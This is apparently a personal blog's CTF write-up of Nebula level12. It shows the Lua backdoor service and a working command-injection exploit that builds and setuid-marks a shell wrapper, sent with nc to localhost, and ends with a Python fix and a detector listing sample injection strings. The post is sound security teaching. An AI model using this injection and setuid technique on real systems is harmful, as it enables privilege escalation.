Monday, September 3, 2012

nebula level12

Level details:
There is a backdoor process listening on port 50001.
Source code:
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
    prog = io.popen("echo "..password.." | sha1sum", "r")
    data = prog:read("*all")
    prog:close()
    data = string.sub(data, 1, 40)
    return data
end

while 1 do
    local client = server:accept()
    client:send("Password: ")
    client:settimeout(60)
    local line, err = client:receive()
    if not err then
        print("trying " .. line) -- log from where ;\
        local h = hash(line)
        if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
            client:send("Better luck next time\n");
        else
            client:send("Congrats, your token is 413**CARRIER LOST**\n")
        end
    end
    client:close()
end
This one is super easy. It's a service written in Lua that asks you for a password. The password's SHA-1 hash is computed and compared against a hardcoded hash. That comparison is a red herring, because the real problem lives in the hash function itself: the password is spliced as-is into the shell command that produces the SHA-1 hash, with no quoting or escaping at all. That makes this a straightforward command injection vulnerability.
level12@nebula:~$ cat > /tmp/shell.c
#include <unistd.h>
#include <stdlib.h>

int main()
{
    int euid = geteuid();

    setresuid(euid, euid, euid);
    system("sh");
    return 0;
}
level12@nebula:~$ echo '; cc -o /tmp/flag12_sh /tmp/shell.c; chmod +s /tmp/flag12_sh; echo' | nc localhost 50001
Password: Better luck next time
level12@nebula:~$ /tmp/flag12_sh
sh-4.2$ id
uid=987(flag12) gid=1013(level12) egid=987(flag12) groups=987(flag12),1013(level12)
sh-4.2$ getflag
You have successfully executed getflag on a target account
Still worth a flag though.
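For comparison, here is how the hash check should have been written so that no shell ever sees the password. This is an added example in Python, not code from the level or from Nebula: it reproduces the exact digest semantics of the Lua hash() (echo appends a newline, so the hardcoded hash is of password plus "\n") without a shell, and it also scans the "trying ..." log lines the service prints for shell metacharacters, which is how an operator would spot attempts against the original code. The sample log lines are constructed.

```python
import hashlib
import re
import subprocess

# Hardcoded hash from the level12 source (digest of password + "\n").
EXPECTED_HASH = "4754a4f4bd5787accd33de887b9250a0691dd198"


def safe_hash(password: str) -> str:
    """In-process replacement for the Lua hash(): same digest as
    `echo <password> | sha1sum`, but the input never reaches a shell."""
    return hashlib.sha1((password + "\n").encode()).hexdigest()


def safe_hash_via_sha1sum(password: str) -> str:
    """If the external tool must stay: argv list (no shell) and the
    password delivered on stdin instead of spliced into a command string."""
    out = subprocess.run(["sha1sum"], input=(password + "\n").encode(),
                         capture_output=True, check=True).stdout
    return out.decode()[:40]  # sha1sum prints "<40 hex>  -"


def check_password(password: str) -> bool:
    return safe_hash(password) == EXPECTED_HASH


# The service logs every attempt as "trying <line>". Shell metacharacters in
# that field are a strong signal that someone is probing the old hash().
SHELL_META = re.compile(r"[;|&`$(){}<>\\]")


def is_suspicious(log_line: str) -> bool:
    m = re.match(r"^trying (.*)$", log_line)
    return bool(m) and bool(SHELL_META.search(m.group(1)))


def flag_attempts(lines):
    """Return only the log lines that look like injection attempts."""
    return [line for line in lines if is_suspicious(line)]


# Constructed sample log lines (not from the original post).
SAMPLE_LOG = [
    "trying hunter2",
    "trying ; id; echo",
    "trying $(id)",
    "trying correct horse battery staple",
]

if __name__ == "__main__":
    print(safe_hash("abc"))
    print(flag_attempts(SAMPLE_LOG))
```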

~ Dmitry
